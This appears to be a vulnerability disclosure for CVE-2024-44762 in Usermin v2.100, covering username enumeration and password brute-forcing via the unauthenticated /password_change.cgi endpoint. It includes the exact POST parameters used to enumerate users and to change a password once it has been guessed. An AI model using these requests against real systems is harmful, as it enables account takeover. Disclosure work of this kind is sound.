Overview
Key information
– Vendor: Webmin
– Product & Version : Usermin v2.100
– Affected component: The password_change.cgi page on Usermin v2.100
– Vulnerabilities: Username enumeration & Brute force vulnerability
– Attack vectors: To exploit these vulnerabilities, an attacker has to sent multiple POST requests to the /password_change.cgi endpoint.
– CVE Number: CVE-2024-44762
Username enumeration description
A discrepancy in error messages for invalid login attempts allows attackers to enumerate valid user accounts (Usermin v2.100).
Brute force vulnerability description
No rate limiting and no lock out mechanism makes it possible to brute
force the password_change.cgi page (Usermin v2.100). This makes it possible to first enumerate the username and then try to brute force
the password of this user on this page. An attacker is able to change
the password once a valid password has been found.
Both of these vulnerabilities are enabled by default and can be accessed without any authentication.
Username enumeration steps
After installing webmin and usermin it should be possible to visit https://127.0.0.1:20000/ to visit the Usermin login page as shown in the image below:
Perform a POST request to /password_change.cgi with the following parameters:
user=UsernameHere&pam=&expired=2&old=pass&new1=new&new2=new |
By providing an invalid username it will show an error message that the login name was not found in the password file:
However when providing a valid username, but an invalid password it will give an error message that the current password is incorrect:
With no rate limiting on this request makes it possible to enumerate usernames and use them for the brute force vulnerability.
Brute force steps
The same request can be used (/password_change.cgi) to brute force an account and change it’s password. Except you have to brute force the old parameter.
user=UsernameHere&pam=&expired=2&old=pass&new1=NewPass!&new2=NewPass ! |
By performing a dictionary or brute force attack it’s possible to find out the password and change it to something new. Below shows a successful password change.
Once changed you are able to successfully login to the Usermin page.
CVSSv3.1 Score
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (5.3)
References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44762
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
https://portswigger.net/burp
https://webmin.com/